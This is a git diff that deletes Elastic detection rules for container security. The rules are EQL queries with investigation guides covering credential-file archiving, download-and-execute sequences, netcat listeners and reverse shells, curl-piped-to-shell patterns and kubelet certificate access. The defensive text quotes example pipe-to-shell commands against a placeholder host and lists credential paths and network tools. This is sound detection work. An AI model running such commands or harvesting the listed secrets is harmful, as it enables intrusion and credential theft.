- "7z", "/bin/7z", "/usr/bin/7z", "/usr/local/bin/7z",
- "rar", "/bin/rar", "/usr/bin/rar", "/usr/local/bin/rar",
- "7zip", "/bin/7zip", "/usr/bin/7zip", "/usr/local/bin/7zip",
- "p7zip", "/bin/p7zip", "/usr/bin/p7zip", "/usr/local/bin/p7zip"
- ) and
- /* default exclusion list to not FP on default multi-process commands */
- not process.args in (
- "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which",
- "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man",
- "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod",
- "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown"
- )
- )
-) and
-process.args like~ (
- "*/root/.ssh/*", "*/home/*/.ssh/*", "*/root/.bash_history*", "*/etc/hosts*", "*/root/.aws/*", "*/home/*/.aws/*",
- "*/root/.docker/*", 
"*/home/*/.docker/*", "*/etc/group*", "*/etc/passwd*", "*/etc/shadow*", "*/etc/gshadow*",
- "*/.azure/*", "*/var/run/secrets/azure/*", "*/.config/gcloud/*", "*application_default_credentials.json*",
- "*type: service_account*", "*client_email*", "*private_key_id*", "*private_key*", "*/var/run/secrets/google/*",
- "*GOOGLE_APPLICATION_CREDENTIALS*", "*AZURE_CLIENT_ID*", "*AZURE_TENANT_ID*", "*AZURE_CLIENT_SECRET*",
- "*AZURE_FEDERATED_TOKEN_FILE*", "*IDENTITY_ENDPOINT*", "*IDENTITY_HEADER*", "*MSI_ENDPOINT*", "*MSI_SECRET*"
-) and process.interactive == true and container.id like "*"
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1560"
-name = "Archive Collected Data"
-reference = "https://attack.mitre.org/techniques/T1560/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1560.001"
-name = "Archive via Utility"
-reference = "https://attack.mitre.org/techniques/T1560/001/"
-
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1552.001"
-name = "Credentials In Files"
-reference = "https://attack.mitre.org/techniques/T1552/001/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/integrations/cloud_defend/command_and_control_file_creation_execution_deletion_sequence.toml b/rules/integrations/cloud_defend/command_and_control_file_creation_execution_deletion_sequence.toml
deleted file mode 100644
index a9a634d7f81..00000000000
--- a/rules/integrations/cloud_defend/command_and_control_file_creation_execution_deletion_sequence.toml
+++ /dev/null
@@ -1,147 +0,0 @@
-[metadata]
-creation_date = "2026/03/05"
-integration = ["cloud_defend"]
-maturity = "production"
-min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
-min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
-
-[rule]
-author = ["Elastic"]
-description = """
-This rule detects the creation, execution, and deletion of files inside a container, a common
-technique used by attackers to evade detection.
-"""
-from = "now-6m"
-index = ["logs-cloud_defend.process*", "logs-cloud_defend.file*"]
-interval = "5m"
-language = "eql"
-license = "Elastic License v2"
-name = "Ingress Tool Transfer Followed by Execution and Deletion Detected via Defend for Containers"
-note = """## Triage and analysis
-
-> **Disclaimer**:
-> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
-
-### Investigating Ingress Tool Transfer Followed by Execution and Deletion Detected via Defend for Containers
-
-This detection flags a rapid sequence inside a container where a file is written to a common transient or user-writable location, executed, then deleted shortly after—an evasion pattern meant to minimize on-disk artifacts and frustrate forensic review. Attackers often use a shell to pull a payload with common transfer utilities into `/tmp` or shared memory, run it immediately for credential theft or lateral movement, and then remove it to blend back into normal container churn.
-
-### Possible investigation steps
-
-- Pivot on the container to review the full process tree and preceding commands around the sequence to determine how the payload was introduced (interactive shell, entrypoint, cron, CI job, or exploited service) and what else executed nearby in time. 
-- Retrieve the file content if still present or recover it from container runtime logs/snapshots/registry layers, then compute hashes and run static/dynamic analysis to identify malware family, network indicators, and persistence or credential-access behavior.
-- Review outbound network connections from the container during the same window to identify download sources, callback infrastructure, and any subsequent lateral movement attempts to internal services.
-- Check whether the container or pod is running with elevated privileges (host mounts, privileged mode, sensitive service account tokens, or access to Docker/CRI sockets) to assess host-escape risk and scope potential impact beyond the container.
-- Validate legitimacy by correlating with recent deploys/build steps and expected package/install activity, and if suspicious, isolate the workload and rotate any exposed secrets or tokens used by the container.
-
-### False positive analysis
-
-- A container entrypoint or bootstrap script downloads a small helper or configuration artifact into `/tmp` (or similar), executes it via a shell to perform initialization checks or configuration, and then deletes it immediately to keep the runtime filesystem clean.
-- A build/test step running inside a container fetches transient binaries or linkable objects (e.g., via `curl`/`wget`/`scp` or `ld`) into writable paths like `/tmp` or `/opt`, executes them as part of compilation or validation, and removes them as part of routine cleanup.
-
-### Response and remediation
-
-- Quarantine the affected pod or container by isolating it from the network and scaling it to zero or killing the container while preserving a copy of the writable layer and runtime logs for forensic analysis. 
-- Identify and block the download and command-and-control endpoints used by the transfer utility (for example the `curl`/`wget` URL or `scp` destination) at egress controls, then search for the same indicator across other workloads and nodes to find additional compromised containers.
-- Eradicate by rebuilding and redeploying the workload from a known-good image and clean source, removing any unauthorized startup scripts or injected binaries in paths like `/tmp`, `/dev/shm`, `/var/tmp`, `/root`, or `/opt`.
-- Rotate and revoke any credentials the container could access such as Kubernetes service account tokens, API keys, registry credentials, and mounted secrets, and invalidate sessions if the executed payload could have harvested them.
-- Escalate to incident response immediately if the workload was privileged, had hostPath mounts or container runtime socket access, touched `/proc/*/fd/*`, or showed signs of data access or lateral movement to internal services.
-- Harden by enforcing least privilege and runtime controls such as read-only root filesystems, no shell or download tools in production images, restricted egress allowlists, and admission policies that block privileged pods and sensitive host mounts. 
-"""
-references = [
- "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware",
-]
-risk_score = 73
-rule_id = "1dc56174-5d02-4ca4-af92-e391f096fb21"
-severity = "high"
-tags = ["Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
-timestamp_override = "event.ingested"
-type = "eql"
-query = '''
-sequence by container.id, user.id with maxspan=10s
- [file where event.action == "creation" and (
- process.name in ("curl", "wget", "fetch", "ftp", "sftp", "scp", "rsync", "ld") or
- (
- process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and
- process.args in (
- "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl",
- "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget",
- "fetch", "/bin/fetch", "/usr/bin/fetch", "/usr/local/bin/fetch",
- "ftp", "/bin/ftp", "/usr/bin/ftp", "/usr/local/bin/ftp",
- "sftp", "/bin/sftp", "/usr/bin/sftp", "/usr/local/bin/sftp",
- "scp", "/bin/scp", "/usr/bin/scp", "/usr/local/bin/scp",
- "rsync", "/bin/rsync", "/usr/bin/rsync", "/usr/local/bin/rsync",
- "ld", "/bin/ld", "/usr/bin/ld", "/usr/local/bin/ld"
- ) and
- /* default exclusion list to not FP on default multi-process commands */
- not process.args in (
- "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which",
- "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man",
- "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod",
- "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown"
- )
- )
- ) and file.path like (
- "/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", "/var/www/*",
- "/proc/*/fd/*", "/home/*/*", "/root/*", "/opt/*"
- )
- ] by file.name
- [process where event.type == "start" and event.action == "exec" and
- process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", 
"fish", "busybox")
- ] by process.name
- [file where event.action == "deletion" and file.path like (
- "/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", "/var/www/*",
- "/proc/*/fd/*", "/home/*/*", "/root/*", "/opt/*"
- ) and not process.name in ("rm", "ld", "conftest", "link", "gcc", "getarch", "ld")
- ] by file.name
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1105"
-name = "Ingress Tool Transfer"
-reference = "https://attack.mitre.org/techniques/T1105/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1070"
-name = "Indicator Removal"
-reference = "https://attack.mitre.org/techniques/T1070/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1070.004"
-name = "File Deletion"
-reference = "https://attack.mitre.org/techniques/T1070/004/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/cloud_defend/command_and_control_interactive_file_creation_in_system_binary_locations.toml b/rules/integrations/cloud_defend/command_and_control_interactive_file_creation_in_system_binary_locations.toml
deleted file mode 100644
index a7076eb7113..00000000000
--- a/rules/integrations/cloud_defend/command_and_control_interactive_file_creation_in_system_binary_locations.toml
+++ /dev/null
@@ -1,93 +0,0 @@
-[metadata]
-creation_date = "2026/02/06"
-integration = ["cloud_defend"]
-maturity = "production"
-min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
-min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
-
-[rule]
-author = ["Elastic"]
-description = """
-This rule detects when an interactive process creates a file inside of a system binary location, inside of a running
-container. The system binary locations are /etc, /root, /bin, /usr/bin, /usr/local/bin, and /entrypoint. Adversaries
-may use these locations to create files that can be used to execute commands on the underlying host, or to evade
-detection by security controls.
-"""
-from = "now-6m"
-index = ["logs-cloud_defend.file*"]
-interval = "5m"
-language = "eql"
-license = "Elastic License v2"
-name = "System Path File Creation and Execution Detected via Defend for Containers"
-note = """## Triage and analysis
-
-> **Disclaimer**:
-> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
-
-### Investigating System Path File Creation and Execution Detected via Defend for Containers
-
-This detects an interactive session in a running Linux container creating new files under system binary paths like /etc, /root, /bin, /usr/bin, /usr/local/bin, or /entrypoint, which often signals an attempt to tamper with execution flow or hide tooling. Attackers commonly gain a shell, then use curl/wget (or a busybox variant) from a writable staging area to drop a new executable into /usr/local/bin or overwrite an entrypoint script to ensure their code runs on start. 
-
-### Possible investigation steps
-
-- Capture the created file’s metadata (owner, permissions, timestamps) and contents/hash, then determine whether it is an executable/script or a modification to startup/auth/config behavior.
-- Compare the file and its path against the container image baseline (layer diff) to confirm it was introduced at runtime and identify the interactive command that created it.
-- Review the interactive session context (TTY, user, entry method) and surrounding command activity to assess intent and whether secrets or credentials were accessed.
-- Pivot to related activity from the same session such as outbound connections, additional downloads to writable staging areas, or subsequent execution of the new file to gauge impact and scope.
-- Check for persistence or host-impact setup by inspecting entrypoint/service definitions, PATH hijacks, mounted host paths, and any new cron/systemd/profile changes within the container.
-
-### False positive analysis
-
-- A container administrator troubleshooting interactively may use curl/wget (including via busybox wget) to fetch configuration or helper scripts and write them into /etc, /root, or /entrypoint to quickly test startup or runtime behavior changes.
-- An interactive maintenance session may execute a script staged in /tmp or /dev/shm that drops a small wrapper binary or symlink into /usr/local/bin or /usr/bin to temporarily add debugging utilities or adjust PATH-resolved command behavior during incident response.
-
-### Response and remediation
-
-- Isolate the impacted container by removing it from service and blocking its egress, then preserve the container filesystem (or take a snapshot) so the created artifacts under /etc, /root, /bin, /usr/bin, /usr/local/bin, or /entrypoint can be analyzed. 
-- Identify and remove the dropped or modified file(s) and any related persistence (e.g., altered /entrypoint script, PATH-hijacking binaries, modified shell profiles), then stop any processes launched from writable staging paths like /tmp, /dev/shm, /var/tmp, /run, /var/run, or /mnt.
-- Redeploy the workload from a known-good image and verified configuration (including entrypoint and mounted volumes), rotate any secrets or tokens that could have been accessed in the interactive session, and validate the new pod/container does not recreate files in system binary locations.
-- Escalate immediately to the incident response team if the created file is executable, replaces an entrypoint, initiates outbound downloads or connections, or if multiple containers show similar drops in system binary paths suggesting broader compromise.
-- Harden by enforcing non-root, read-only root filesystem, and disallowing interactive exec into production containers, then restrict outbound network access and block write access to system binary locations via security policies and runtime controls."""
-risk_score = 47
-rule_id = "05a50000-9886-4695-ad33-3f990dc142e2"
-severity = "medium"
-tags = ["Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
-timestamp_override = "event.ingested"
-type = "eql"
-query = '''
-file where host.os.type == "linux" and event.type == "creation" and process.interactive == true and
-file.path like (
- "/etc/*", "/root/*", "/bin/*", "/usr/bin/*", "/usr/local/bin/*", "/entrypoint*"
-) and (
- process.name like ("wget", "curl") or
- (process.name == "busybox" and process.args == "wget") or
- process.executable like ("/tmp/*", "/dev/shm/*", "/var/tmp/*", "/run/*", "/var/run/*", "/mnt/*")
-) and container.id like "?*"
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1105"
-name = 
"Ingress Tool Transfer"
-reference = "https://attack.mitre.org/techniques/T1105/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1036"
-name = "Masquerading"
-reference = "https://attack.mitre.org/techniques/T1036/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/cloud_defend/command_and_control_netcat_listener_established_inside_a_container.toml b/rules/integrations/cloud_defend/command_and_control_netcat_listener_established_inside_a_container.toml
deleted file mode 100644
index eec7a040eab..00000000000
--- a/rules/integrations/cloud_defend/command_and_control_netcat_listener_established_inside_a_container.toml
+++ /dev/null
@@ -1,115 +0,0 @@
-[metadata]
-creation_date = "2023/04/26"
-integration = ["cloud_defend"]
-maturity = "production"
-min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
-min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
-
-[rule]
-author = ["Elastic"]
-description = """
-This rule detects an established netcat file transfer or listener running inside a container. Netcat is a utility
-used for reading and writing data across network connections, and it can be used for malicious purposes such as
-establishing a backdoor for persistence, exfiltrating data or file transfer.
-"""
-false_positives = [
- """
- There is a potential for false positives if the container is used for legitimate tasks that require the use of
- netcat, such as network troubleshooting, testing or system monitoring. It is important to investigate any alerts
- generated by this rule to determine if they are indicative of malicious activity or part of legitimate container
- activity.
- """,
-]
-from = "now-6m"
-index = ["logs-cloud_defend.process*"]
-interval = "5m"
-language = "eql"
-license = "Elastic License v2"
-name = "Netcat File Transfer or Listener Detected via Defend for Containers"
-note = """## Setup
-
-## Triage and analysis
-
-> **Disclaimer**:
-> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
-
-### Investigating Netcat File Transfer or Listener Detected via Defend for Containers
-
-Netcat is a versatile networking tool used for reading and writing data across network connections, often employed for legitimate purposes like debugging and network diagnostics. However, adversaries can exploit Netcat to establish unauthorized backdoors or exfiltrate data from containers. 
The detection rule identifies suspicious Netcat activity by monitoring process events within containers, focusing on specific arguments that indicate a listening state, which is a common trait of malicious use. This proactive detection helps mitigate potential threats by flagging unusual network behavior indicative of compromise.
-
-### Possible investigation steps
-
-- Review the container ID associated with the alert to identify the specific container where the Netcat listener was established. This can help in understanding the context and potential impact.
-- Examine the process name and arguments to confirm the presence of Netcat and its listening state. Look for arguments like "-l", "--listen", "-p", or "--source-port" to verify the listener setup.
-- Check the parent process of the Netcat instance to determine how it was initiated. This can provide insights into whether it was started by a legitimate application or a potentially malicious script.
-- Investigate the network connections associated with the container to identify any unusual or unauthorized connections that may indicate data exfiltration or communication with a command and control server.
-- Analyze the container's recent activity and logs to identify any other suspicious behavior or anomalies that could be related to the Netcat listener, such as unexpected file modifications or other process executions.
-- Assess the container's security posture and configuration to determine if there are any vulnerabilities or misconfigurations that could have been exploited to establish the Netcat listener.
-
-### False positive analysis
-
-- Development and testing activities within containers may trigger the rule if Netcat is used for legitimate debugging or network diagnostics. Users can create exceptions for specific container IDs or process names associated with known development environments. 
-- Automated scripts or tools that utilize Netcat for routine network checks or health monitoring might be flagged. To mitigate this, users can whitelist these scripts by identifying their unique process arguments or execution patterns.
-- Containers running network services that rely on Netcat for legitimate communication purposes could be mistakenly identified. Users should document and exclude these services by specifying their container IDs and associated process arguments.
-- Security tools or monitoring solutions that incorporate Netcat for legitimate scanning or testing purposes may cause false positives. Users can manage this by excluding these tools based on their known process names and arguments.
-
-### Response and remediation
-
-- Immediately isolate the affected container to prevent further unauthorized access or data exfiltration. This can be done by stopping the container or disconnecting it from the network.
-- Conduct a thorough review of the container's logs and process history to identify any unauthorized access or data transfers that may have occurred.
-- Remove any unauthorized Netcat binaries or scripts found within the container to eliminate the backdoor.
-- Rebuild the container from a known good image to ensure no residual malicious artifacts remain.
-- Update container images and underlying host systems with the latest security patches to mitigate vulnerabilities that could be exploited by similar threats.
-- Implement network segmentation and firewall rules to restrict unauthorized outbound connections from containers, reducing the risk of data exfiltration. 
-- Escalate the incident to the security operations team for further investigation and to assess the potential impact on other containers or systems within the environment."""
-risk_score = 47
-rule_id = "a52a9439-d52c-401c-be37-2785235c6547"
-severity = "medium"
-tags = ["Tactic: Command and Control", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
-timestamp_override = "event.ingested"
-type = "eql"
-query = '''
-process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and (
- process.name in ("nc","ncat","netcat","netcat.openbsd","netcat.traditional") or
- (
- /* account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */
- process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and
- process.args in (
- "nc", "/bin/nc", "/usr/bin/nc", "/usr/local/bin/nc",
- "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat",
- "netcat", "/bin/netcat", "/usr/bin/netcat", "/usr/local/bin/netcat",
- "netcat.openbsd", "/bin/netcat.openbsd", "/usr/bin/netcat.openbsd", "/usr/local/bin/netcat.openbsd",
- "netcat.traditional", "/bin/netcat.traditional", "/usr/bin/netcat.traditional", "/usr/local/bin/netcat.traditional"
- ) and
- /* default exclusion list to not FP on default multi-process commands */
- not process.args in (
- "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which",
- "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man",
- "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod",
- "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown"
- )
- )
-) and
-process.args like~ (
- /* bind shell to specific port or listener */
- "-*l*","-*p*",
- /* reverse shell to command-line interpreter used for command execution */
- "-*e*",
- /* file transfer via stdout/pipe */
- ">","<", "|"
-) and process.interactive == true and 
container.id like "*"
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1095"
-name = "Non-Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1095/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/integrations/cloud_defend/command_and_control_payload_downloaded_and_piped_to_shell.toml b/rules/integrations/cloud_defend/command_and_control_payload_downloaded_and_piped_to_shell.toml
deleted file mode 100644
index 8be32a0812f..00000000000
--- a/rules/integrations/cloud_defend/command_and_control_payload_downloaded_and_piped_to_shell.toml
+++ /dev/null
@@ -1,119 +0,0 @@ -[metadata] -creation_date = "2026/02/10" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects when a payload is downloaded and piped to a shell inside a running container. This -could indicate a threat actor downloaded a payload and executed it using a shell without the payload -being stored on the filesystem. -""" -from = "now-6m" -index = ["logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Payload Execution via Shell Pipe Detected by Defend for Containers" -note = """## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Payload Execution via Shell Pipe Detected by Defend for Containers - -This rule detects an interactive session in a running Linux container where a downloader process is immediately followed by a shell execution, consistent with fetching code and executing it without writing a file. This matters because piping remote content directly into a shell enables fast, stealthy execution and can bypass filesystem-based controls and forensics. Attackers commonly run patterns like `curl http://host/payload.sh | sh` or `wget -qO- http://host/bootstrap | bash` during initial foothold or lateral movement inside containers. - -### Possible investigation steps - -- Capture the full interactive command line and session context (TTY/user, working directory, parent chain) to determine whether the shell received stdin from the downloader and what was executed. 
-- Identify the remote URL/host contacted and pivot on outbound network telemetry (DNS/HTTP/SNI/IP) to confirm download success, reputation, and whether the endpoint has been used by other workloads. -- Enumerate follow-on processes spawned by the shell within the next few minutes (e.g., package installs, compilers, crypto-miners, persistence tooling) to assess impact and scope of execution. -- Check for container breakout or host interaction indicators by reviewing new mounts, access to the Docker/CRI socket, privileged namespace usage, and any writes to host paths from within the container. -- Preserve volatile artifacts by exporting the container filesystem and collecting in-memory/runtime evidence (environment variables, loaded binaries, cron/systemd/user profiles) before the workload is recycled. - -### False positive analysis - -- An administrator or developer may use an interactive exec session to troubleshoot or apply a quick remediation by running `curl`/`wget` piped into `sh` (to avoid saving a temporary file), so validate the interactive user/TTY, parent process chain, and whether the contacted URL/host is an expected internal source. -- During manual container bootstrap or environment setup, an operator may fetch a short initialization or configuration script via `curl`/`wget` and immediately invoke a shell to run it, so confirm it aligns with recent deployment/change activity and that follow-on process, network, and filesystem behavior matches the intended setup. - -### Response and remediation - -- Immediately isolate the affected container/pod by blocking egress and terminating any active `kubectl exec`/interactive sessions that launched `curl`/`wget` and then a shell to stop further command execution. -- Preserve evidence before restart by snapshotting the container image/filesystem and collecting running process trees, open network connections, environment variables, and shell history/output associated with the piped execution. 
-- Eradicate by deleting and redeploying the workload from a known-good image, rotating any secrets and tokens available to the container, and removing any unauthorized binaries, cron jobs, startup scripts, or modified entrypoints created by the shell session. -- Escalate to incident response immediately if the downloaded content contacted unknown/external infrastructure, spawned post-exploitation tooling (e.g., miners, scanners, reverse shells), or showed signs of host interaction such as access to the container runtime socket or host-mounted paths. -- Harden by restricting interactive exec access (RBAC/MFA/just-in-time), enforcing signed/approved images, applying network policies to limit outbound access, and adding runtime controls to block `curl|sh`/`wget|sh` patterns or require allowlisted internal artifact sources.""" -references = [ - "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", -] -risk_score = 47 -rule_id = "a750bbcc-863f-41ef-9924-fd8224e23694" -severity = "medium" -tags = ["Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -sequence by process.parent.entity_id, container.id with maxspan=1s - [process where event.type == "start" and event.action == "exec" and process.name in ("curl", "wget")] - [process where event.action in ("exec", "end") and - /* - If the flow is executed from a parent script, the event action will be "exec". - If the flow is executed manually, the event action will be "end". 
- */
- process.name like (
- "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox",
- "python*", "perl*", "ruby*", "lua*", "php*"
- ) and
- process.args like (
- "-bash", "-dash", "-sh", "-tcsh", "-csh", "-zsh", "-ksh", "-fish",
- "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish",
- "/bin/bash", "/bin/dash", "/bin/sh", "/bin/tcsh", "/bin/csh",
- "/bin/zsh", "/bin/ksh", "/bin/fish",
- "/usr/bin/bash", "/usr/bin/dash", "/usr/bin/sh", "/usr/bin/tcsh",
- "/usr/bin/csh", "/usr/bin/zsh", "/usr/bin/ksh", "/usr/bin/fish",
- "-busybox", "busybox", "/bin/busybox", "/usr/bin/busybox",
- "*python*", "*perl*", "*ruby*", "*lua*", "*php*", "/dev/fd/*"
- ) and
- not process.args in (
- "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which",
- "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man",
- "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod",
- "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown"
- )]
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1105"
-name = "Ingress Tool Transfer"
-reference = "https://attack.mitre.org/techniques/T1105/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/cloud_defend/credential_access_kubelet_certificate_file_access.toml b/rules/integrations/cloud_defend/credential_access_kubelet_certificate_file_access.toml
deleted file mode 100644
index 97d638e70c1..00000000000
--- a/rules/integrations/cloud_defend/credential_access_kubelet_certificate_file_access.toml
+++ /dev/null
@@ -1,101 +0,0 @@ -[metadata] -creation_date = "2026/02/02" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects the access of the Kubelet certificate file inside a container. The Kubelet certificate file is -used to authenticate the container to the Kubernetes API server, and may be used by an adversary to gain access -to the Kubernetes API server or other resources within the cluster. These files are a common target for adversaries -to gain access to the cluster. There is a current limitation in the defend for containers file sensor that prevents -file open events from being logged for file open events without write intent. -""" -from = "now-6m" -index = ["logs-cloud_defend.file*", "logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Kubelet Certificate File Access Detected via Defend for Containers" -note = """ ## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Kubelet Certificate File Access Detected via Defend for Containers - -This detection flags an interactive process inside a Linux container opening files under `/var/lib/kubelet/pki/`, which includes the kubelet client certificate and key used to authenticate to the Kubernetes API. Attackers who obtain these credentials can impersonate the node, enumerate cluster resources, and pivot to secrets or workloads. 
A common pattern is an operator exec’ing into a compromised pod, locating the kubelet cert/key pair, copying it out, then using it to query the API server from outside the container. - -### Possible investigation steps - -- Identify the pod/namespace/node and owning controller for the container, then confirm whether it should ever have access to host kubelet PKI (e.g., privileged DaemonSet, hostPath mount, node-agent tooling) or if this is an unexpected breakout indicator. -- Review the interactive session context (exec/attach/ssh), including who initiated it and the command history/TTY telemetry around the alert time, to determine whether this was routine debugging or suspicious enumeration. -- Inspect the container filesystem and recent file operations for evidence of credential harvesting (reads of kubelet client cert/key pairs, copies to temporary paths, archive creation, or outbound transfer tooling) and preserve artifacts for forensics. -- Correlate immediately after the access event for Kubernetes API activity using node credentials (unusual discovery, secret access, or cluster-wide queries) originating from the same workload identity, node, or egress address. -- Validate whether kubelet credentials were reused by reviewing API server audit logs for unexpected node identity actions, and rotate kubelet client certs/keys and isolate the workload if misuse is suspected. - -### False positive analysis - -- A cluster operator or SRE may exec into a privileged pod (e.g., a DaemonSet with hostPath access to `/var/lib/kubelet`) for node troubleshooting and use interactive shell commands to inspect or validate kubelet PKI files during incident response or routine maintenance. 
